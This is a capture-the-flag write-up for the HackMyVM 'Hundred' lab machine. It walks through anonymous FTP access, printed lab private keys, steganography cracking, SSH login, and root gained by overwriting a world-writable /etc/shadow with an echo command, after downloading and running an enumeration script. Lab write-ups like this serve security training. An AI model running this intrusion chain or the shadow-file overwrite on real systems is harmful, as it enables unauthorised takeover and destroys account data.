Post

Hundred Writeup HackMyVM

Posted Updated
By Surapura 8 min read

Alt Text

In the enumeration phase, an FTP server with anonymous login was discovered. Upon further investigation, a key was found and successfully decrypted, revealing subdirectories and a logo. Decrypting the logo provided a passphrase for SSH. A privilege escalation script (lse.sh) was then used to escalate privileges and obtain the root flag

vm link

» Machine IP

Alt Text

» Make a new directory for machine and change to that directory

1
2
3
4
5

┌──(kali㉿kali)-[~]
└─$ cd Desktop/hundred
                                                                             
┌──(kali㉿kali)-[~/Desktop/hundred]
└─$

» Create a variable for the IP to avoid retyping the address each time

1
2

┌──(kali㉿kali)-[~/Desktop/hundred]
└─$ ip=192.168.1.10


Enumeration


» Scan for open ports and services using nmap

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50

┌──(kali㉿kali)-[~/Desktop/hundred]
└─$ sudo nmap -sC -sV -T4 -A -O -p- $ip
[sudo] password for kali: 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-04 22:50 EST
Nmap scan report for 192.168.0.10
Host is up (0.00057s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:192.168.0.10
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 1
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rwxrwxrwx    1 0        0             435 Aug 02  2021 id_rsa [NSE: writeable]
| -rwxrwxrwx    1 1000     1000         1679 Aug 02  2021 id_rsa.pem [NSE: writeable]
| -rwxrwxrwx    1 1000     1000          451 Aug 02  2021 id_rsa.pub [NSE: writeable]
|_-rwxrwxrwx    1 0        0             187 Aug 02  2021 users.txt [NSE: writeable]
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 ef:28:1f:2a:1a:56:49:9d:77:88:4f:c4:74:56:0f:5c (RSA)
|   256 1d:8d:a0:2e:e9:a3:2d:a1:4d:ec:07:41:75:ce:47:0e (ECDSA)
|_  256 06:80:3b:fc:c5:f7:7d:c5:58:26:83:c4:f7:7e:a3:d9 (ED25519)
80/tcp open  http    nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:F2:09:65 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.57 ms 192.168.0.10

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.02 seconds
  • Port 21 Anonymous Login allowed

» Connect to Port 21 with Anonymous Login

1
2
3
4
5
6
7
8
9
10

┌──(kali㉿kali)-[~/Desktop/hundred]
└─$ ftp anonymous@$ip
Connected to 192.168.0.10.
220 (vsFTPd 3.0.3)
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> 

1
2
3
4
5
6
7
8
9

ftp> ls
229 Entering Extended Passive Mode (|||41572|)
150 Here comes the directory listing.
-rwxrwxrwx    1 0        0             435 Aug 02  2021 id_rsa
-rwxrwxrwx    1 1000     1000         1679 Aug 02  2021 id_rsa.pem
-rwxrwxrwx    1 1000     1000          451 Aug 02  2021 id_rsa.pub
-rwxrwxrwx    1 0        0             187 Aug 02  2021 users.txt
226 Directory send OK.
ftp>

» Get all these file and check them.

  • ftp> get id_rsa
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18

┌──(kali㉿kali)-[~/Desktop/hundred]
└─$ ls
id_rsa  id_rsa.pem  id_rsa.pub  users.txt
                                                                           
┌──(kali㉿kali)-[~/Desktop/hundred]
└─$ cat id_rsa.pub  
-----BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwsrHORyA+mG6HS9ZmZwz
PmKHrHhA0/kKCwNjUG8rmPVupv73mUsewpoGvYB9L9I7pUAsMscAb5MVo89d4b0z
2RnXDD1fh6mKlTJmcNwWCnA1PgD+OwqewshpkCBhCV6O2P6dktfA8UI/uqF6uT4Q
ISU4ksriN16cOm/89jHadetB8dCeh3Rx6HrFNccY8aiDRSA9meqz7YGE2+lJ/Ntw
tndUkzzxKxuKC6z4gG780tZHhg83xVwZ9bxPyHfGqHWmV4yGsAgp7mot7pg9Vzff
nP6DAVnbReDDbhNLcnfVXEkBv8SQL7OFIiKxJpoa1ADqGffA5LOPFdYKbbCFMict
QQIDAQAB
-----END PUBLIC KEY-----

┌──(kali㉿kali)-[~/Desktop/hundred]
└─$ 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27

┌──(kali㉿kali)-[~/Desktop/hundred]
└─$ cat id_rsa    
  / \
    / _ \
   | / \ |
   ||   || _______
   ||   || |\     \
   ||   || ||\     \
   ||   || || \    |
   ||   || ||  \__/
   ||   || ||   ||
    \\_/ \_/ \_//
   /   _     _   \
  /               \
  |    O     O    |
  |   \  ___  /   |                           
 /     \ \_/ /     \
/  -----  |  --\    \
|     \__/|\__/ \   |
\       |_|_|       /
 \_____       _____/
       \     /
       |     |
-------------------------

┌──(kali㉿kali)-[~/Desktop/hundred]
└─$ 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32

┌──(kali㉿kali)-[~/Desktop/hundred]
└─$ cat id_rsa.pem
-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEAwsrHORyA+mG6HS9ZmZwzPmKHrHhA0/kKCwNjUG8rmPVupv73
mUsewpoGvYB9L9I7pUAsMscAb5MVo89d4b0z2RnXDD1fh6mKlTJmcNwWCnA1PgD+
OwqewshpkCBhCV6O2P6dktfA8UI/uqF6uT4QISU4ksriN16cOm/89jHadetB8dCe
h3Rx6HrFNccY8aiDRSA9meqz7YGE2+lJ/NtwtndUkzzxKxuKC6z4gG780tZHhg83
xVwZ9bxPyHfGqHWmV4yGsAgp7mot7pg9VzffnP6DAVnbReDDbhNLcnfVXEkBv8SQ
L7OFIiKxJpoa1ADqGffA5LOPFdYKbbCFMictQQIDAQABAoIBAE4Q6IDp/ILcEbPK
mzUl1Z+l60visdCCGVVKmU3OEAHwMtV4j5B++6fwBM2Dpig5MDBNJKmA+Zq9rsmE
vNJQemwCoB3Gpvd+qgybM1T9z1OFnsDnsvvEiNX1beEWKO2RWNx8RnhoQWovK81H
FCETT3GJMkAaUUjxgNkmspGUb0IcP4YR61jpNy8thMLz8FQV8XqNSf4DSd9+8wrm
FBFDFzso6zcBtsY6/nDueaVfLsequU1Fdhh3itC6rPXync/EWN0HJtaiKEVAytYE
cvl1hVpRVhGZGjPqNQSPcknO0K2b22anRoiSpBoCzaopbSZHySFgcZM8oxGgw35j
YpS1ULUCgYEA+1Se5s4AzsOX/3RRwwF9Was//oHU1N2JnJRetF9tjeFu8MEMnSec
a3bcPy+CZHB8oVnoyh647IObzPUjCgMxdyTLdfGmQ8RgzXhwYeQRe+ethrT/Ra26
7m+R+3838k5ZTKnwjBPreV/i2AmwZYDPT2S5q5b7m5Cr4QTfsaScaKsCgYEAxmk/
xzu2XO8YmE+8R62nWdLPMaj4E5IPkT3uCA8G24KGSSyK29OGZ02RI8qxWkdqMxKJ
rTDrQJ/4oU6108Vhay0tyFswbNn0ymlHAhPKxXNr0xHkC6rCnDEnn6W7bspTxxyk
9OUtl2UemtnEKRm3qu9Rc1qLFW0/Zhxw3ovgWcMCgYEAka6HPPoD9dXicSyXiBWA
900QlxHisFCJx70o+ByogClACUWdbirbvF71Y5rCVj3twAlBqocMYewXj0I4wUEA
lzM4zHD6EyXthqxdWCC/EbdFGmQn49fEFxmM4N7pKwbHNGz9BfU19PDjqJ5VJUD4
6ehUx2WJCq9dMd2FXI8yKmkCgYAMBBnBtiMQM8a4irOrX5/v961mo4YKoWDh+e8t
e8N9jcUWL2VldMUCApeUpFTjU8nht/CwlXLZ4hZLppmqbpy8weqw5JzlKroBfCi5
vnscRCY2jTHTZw8MKInuyDm2tvgl6d0vm6WMMqqM1D1mA9G0v3OeWdBshsY9J+HK
CIyYwwKBgQDEXoZ+lZKyPUBSgcE+b52U2Dj9GAPKPUDZpsCbUebftZknOk/HelF1
wiWWDjni1ILVSfWIR4/nvosJPa+39WDv+dFt3bJdcUA3SL2acW3MGVPC6abZWwSo
izXrZm8h0ZSuXyU/uuT3BCJt77HyN2cPZrqccPwanS9du6zrX0u2yQ==
-----END RSA PRIVATE KEY-----

┌──(kali㉿kali)-[~/Desktop/hundred]
└─$
  • This private key looks interesting
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29

┌──(kali㉿kali)-[~/Desktop/hundred]
└─$ cat users.txt 
--- SNIP ---
noname
roelvb
ch4rm
marcioapm
isen
sys7em
chicko
tasiyanci
luken
alienum
linked
tatayoyo
0xr0n1n
exploiter
kanek180
cromiphi
softyhack
b4el7d
val1d
--- SNIP ---

Thanks!
hmv

┌──(kali㉿kali)-[~/Desktop/hundred]
└─$
  • Here we have user name hmv

» Lets try to use private key, chmod 600 id_rsa.pem

1
2
3
4
5
6
7
8
9
10

┌──(kali㉿kali)-[~/Desktop/hundred]
└─$ ssh -i id_rsa.pem hmv@192.168.0.10
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@         WARNING: UNPROTECTED PRIVATE KEY FILE!          @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Permissions 0644 for 'id_rsa.pem' are too open.
It is required that your private key files are NOT accessible by others.
This private key will be ignored.
Load key "id_rsa.pem": bad permissions
hmv@192.168.0.10's password:
  • no luck

» Lets check web server

Alt Text

  • Looks like we have got something here
    • Get h4ckb1tu5.enc and logo.jpg
1
2
3
4
5
6

┌──(kali㉿kali)-[~/Desktop/hundred]
└─$ openssl pkeyutl -decrypt -inkey id_rsa.pem -in h4ckb1tu5.enc -out key
                                                                                 
┌──(kali㉿kali)-[~/Desktop/hundred]
└─$ cat key            
/softyhackb4el7dshelldredd

Alt Text

Look further for directories

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27

┌──(kali㉿kali)-[~/Desktop/hundred]
└─$ gobuster dir -u http://192.168.1.10/softyhackb4el7dshelldredd/ -w /usr/share/wordlists/dirb/common.txt -x php,html,css,js,zip,bak
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.1.10/softyhackb4el7dshelldredd/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              bak,php,html,css,js,zip
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/id_rsa               (Status: 200) [Size: 1876]
/index.html           (Status: 200) [Size: 26]
/index.html           (Status: 200) [Size: 26]
Progress: 32298 / 32305 (99.98%)
===============================================================
Finished
===============================================================
                                                                                 
┌──(kali㉿kali)-[~/Desktop/hundred]
└─$
  • Get /softyhackb4el7dshelldredd/id_rsa
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30

┌──(kali㉿kali)-[~/Desktop/hundred]
└─$ cat id_rsa.1  
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAACmFlczI1Ni1jdHIAAAAGYmNyeXB0AAAAGAAAABC1tMw32e
lFi/dbgCqdqW6TAAAAEAAAAAEAAAEXAAAAB3NzaC1yc2EAAAADAQABAAABAQDTAhcp/5nw
lsy+3EWvxJUZ5ok0krnLNSETXK915aZ1G/r9DEYI00+A03XALv36P8/RMJMTb6O99TMumL
sB18Al014yCEK+zhp0aIMeuIlqlhD0thxXINPGzLewoTZKSctZIRFeO9lNaxqLi4dVDgyB
PwglvDzZldRYxTd6+/RpP+5dPggjoj4ZC5kln+SkD2+EPveTuJQAs/wLaeHgBDVuKUOHD/
FA/Vctw1ZXYzYIL+vkGL8cMjiIlscCE4Ze+3QzHs9otOqPczDoZ5v1IAl0vJ7lKaLR27ov
WnCOQdoS9BVojlEOtOzlyX1V9M1pkePhmzSTaIDMBXuLcYmaKa8LAAAD0AHQ1cvNEthcr2
m8I3a3Mt7Sr0Dfb2Lg7aypmPEgrS5dIGK+t6lReNEUU4KPCXy2RzRs8nKm/fbRxteuTeR6
O/nICGj67XlZl2wHyn5+W/5j8ndxB79t1f5UZWQuzKLwhOe8qEnnyL7sn8EXCjpU3SBcXO
oTiBDNmwZk+L0nQWz/IsCLNXbqgxuYBnRsKd85b5Xgs2uylyTx2qaRq1s6mMV2UMJEmj6U
7rBFbrKcBOrmRSx7p8Pr2rWtUhb8P3p4DL8Z6cVmeruS/Xa85B920t3eK7vNGqA8AH8zKG
xNk8eAkRoSicAnheYJsU5YSAS+AYSOJcA/91xSjqhaFWJuZo9ktw6/L80NSBfUVJhnGtCf
2J1QTXbBxhQ7rGHRIXk/pSMfxsYikmNsnnGU7u/tQKZmlTY1HnOrf0r1EdB6aAzpR0uZxT
t7iPoOCK4/BvJURkG9b31vLKhZPOiUK6sN8N0OQzQxbzQCTRb7v1JfRG57H9wQsMNYZf9S
XWE2GIPl55ww9iECcyvHUWKvL67cWDX42wUQ9UQS37QsVKEPtTJa7rTGG9unqcqkMoq5g4
+uAOAJx7aFhOG48hCwIgqWxHSXQmitTiz36FCakkMwECm2lyjotCCmGoIScMlKxpzsmV4M
wqxWToINy2fGQ1Yem993ACu8zSnLIJ0XUugveeVJkxc0fpYcBEbPzeKs9pkGpk+BDt1dIs
+UEsnoGszQMy7D/xCBINrUW+vmgNVtJVLxtfmxJY/Lnrrf+wIKTPR0sBzdOPmDJFjkudjf
BCzUa1V+Uqlu1CODPxwJSV/9300IYiVjevGeRQwU2Ol8OFFb69a5sDkrtV0zqMNdgvJwT4
qXaW5unXngxkam+w3IY6CHiNW9XK8aLONo56+Bl+8stLB8p0IaT4RjgFO0jUY8fSkuo++g
pGBSACsYutFP4PhqIiIJzovMsTrq/5/OynGRriA0Fum/6seBXNZfBdgnQCH+9o5DJaJ0oS
VyfM9a6g7KM7dIkFRDC4FP/jonTBozaAMEZKVynLT0D5aKpkNmLcqXe4oUW4NJQatXN/ac
qh3a5x38Jkqh7I+CJyFnZpPChHMO8iQF9Vyz3+ABqzLiE2cfsDZoM3KPfz6bTo8uE7j3Eg
KqCn5ZgnewitQGYBVsetAVPwlwuHsKZp/jPr3b0SPZ1lf2elQvqfmj4sRNYhG4YaVGdPbU
hIPePtsxi0+XFAqfgm0h4PM9WdtOEafmPhMbPiP3ITbWCiYNKHXRwiDA56M0zebphDihii
x9NFZeQzcWz9zFQclVpVk1xYQxj48=
-----END OPENSSH PRIVATE KEY-----

1
2
3
4
5
6
7
8
9
10
11
12

┌──(kali㉿kali)-[~/Desktop/hundred]
└─$ stegseek logo.jpg users.txt
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek

[i] Found passphrase: "cromiphi"
[i] Original filename: "toyou.txt".
[i] Extracting to "logo.jpg.out".


┌──(kali㉿kali)-[~/Desktop/hundred]
└─$ cat logo.jpg.out
d4t4s3c#1


Exploitation


» Now we have passphrase, login with it

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29

┌──(kali㉿kali)-[~/Desktop/hundred]
└─$ chmod 600 id_rsa.1

┌──(kali㉿kali)-[~/Desktop/hundred]
└─$ ssh hmv@192.168.1.10 -i id_rsa.1
Enter passphrase for key 'id_rsa.1': 
Linux hundred 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Mon Aug  2 06:43:27 2021 from 192.168.1.51
hmv@hundred:~$ 
hmv@hundred:~$ id
uid=1000(hmv) gid=1000(hmv) groups=1000(hmv),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
hmv@hundred:~$ ls
user.txt
hmv@hundred:~$ ls -l /etc/passwd
-rw-r--r-- 1 root root 1444 Aug  2  2021 /etc/passwd
hmv@hundred:~$ ls -l /etc/shadow
-rwxrwx-wx 1 root shadow 963 Aug  2  2021 /etc/shadow
hmv@hundred:~$ cat /etc/passwd | grep /bin/bash
root:x:0:0:root:/root:/bin/bash
hmv:x:1000:1000:hmv,,,:/home/hmv:/bin/bash
hmv@hundred:~$

Privilege Escalation

» We will be using the lse.sh script for privilege escalation, as it provides detailed information about the security configuration of a Linux system

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32

hmv@hundred:~$ wget "https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh" -O lse.sh;chmod 700 lse.sh
--2024-03-05 04:49:01--  https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh
Resolving github.com (github.com)... 20.207.73.82
Connecting to github.com (github.com)|20.207.73.82|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://github.com/diego-treitos/linux-smart-enumeration/releases/download/4.14nw/lse.sh [following]
--2024-03-05 04:49:01--  https://github.com/diego-treitos/linux-smart-enumeration/releases/download/4.14nw/lse.sh
Reusing existing connection to github.com:443.
HTTP request sent, awaiting response... 302 Found
Location: https://objects.githubusercontent.com/github-production-release-asset-2e65be/170493053/b4b67e2b-961d-40d9-8cc3-1fb8ec6b0ad9?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAVCODYLSA53PQK4ZA%2F20240305%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240305T094901Z&X-Amz-Expires=300&X-Amz-Signature=9d5b83bf6138913d4df70adf7a8f3fd56f1e1ac704c125a27e215f733f4f3384&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=170493053&response-content-disposition=attachment%3B%20filename%3Dlse.sh&response-content-type=application%2Foctet-stream [following]
--2024-03-05 04:49:01--  https://objects.githubusercontent.com/github-production-release-asset-2e65be/170493053/b4b67e2b-961d-40d9-8cc3-1fb8ec6b0ad9?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAVCODYLSA53PQK4ZA%2F20240305%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240305T094901Z&X-Amz-Expires=300&X-Amz-Signature=9d5b83bf6138913d4df70adf7a8f3fd56f1e1ac704c125a27e215f733f4f3384&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=170493053&response-content-disposition=attachment%3B%20filename%3Dlse.sh&response-content-type=application%2Foctet-stream
Resolving objects.githubusercontent.com (objects.githubusercontent.com)... 185.199.108.133, 185.199.111.133, 185.199.109.133, ...
Connecting to objects.githubusercontent.com (objects.githubusercontent.com)|185.199.108.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 55098 (54K) [application/octet-stream]
Saving to: ‘lse.sh’

lse.sh               100%[===================>]  53.81K  --.-KB/s    in 0.04s   

2024-03-05 04:49:03 (1.36 MB/s) - ‘lse.sh’ saved [55098/55098]

hmv@hundred:~$ ./lse.sh -l1

[*] fst110 Other interesting files in home directories..................... nope
[!] fst120 Are there any credentials in fstab/mtab?........................ nope
[*] fst130 Does 'hmv' have mail?........................................... nope
[!] fst140 Can we access other users mail?................................. nope
[*] fst150 Looking for GIT/SVN repositories................................ nope
[!] fst160 Can we write to critical files?................................. yes!
---
-rwxrwx-wx 1 root shadow 963 Aug  2  2021 /etc/shadow
  • /etc/shadow is writable

» Use OpenSSL to generate password hash

1
2
3
4
5
6
7
8
9
10
11
12

hmv@hundred:~$ openssl passwd 1234
RFZ0zFKvyTHJ2
hmv@hundred:~$ echo "root:RFZ0zFKvyTHJ2:18893:0:99999:7:::" > /etc/shadow
hmv@hundred:~$ su
Password: 
root@hundred:/home/hmv# ls /root
root.txt
root@hundred:/home/hmv# ls /home
hmv
root@hundred:/home/hmv# ls
lse.sh  user.txt
root@hundred:/home/hmv#


pwned
Write Up, HackMyVM
Privilege Escalation SSH FTP Decryption
This post is licensed under CC BY 4.0 by the author.